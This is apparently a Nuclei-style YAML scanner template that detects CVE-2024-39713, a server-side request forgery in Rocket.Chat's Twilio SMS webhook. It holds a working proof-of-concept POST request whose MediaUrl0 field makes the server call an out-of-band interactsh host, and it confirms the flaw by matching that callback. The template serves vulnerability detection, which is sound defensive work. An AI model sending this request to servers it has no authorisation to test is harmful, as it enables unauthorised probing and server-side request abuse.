```yaml
id: CVE-2024-39713

info:
  name: Rocket.Chat SSRF (CVE-2024-39713)
  author: typical_pashochek
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-39713
    - https://hackerone.com/reports/1886954
  tags: ssrf,poc,cve,rocket.chat

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/v1/livechat/sms-incoming/twilio"
    headers:
      Content-Type: application/json
    body: |
      {
        "To": "+123",
        "From": "+123",
        "Body": "body",
        "NumMedia": "1",
        "MediaUrl0": "http://{{interactsh-url}}",
        "MediaContentType0": "text/plain"
      }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
```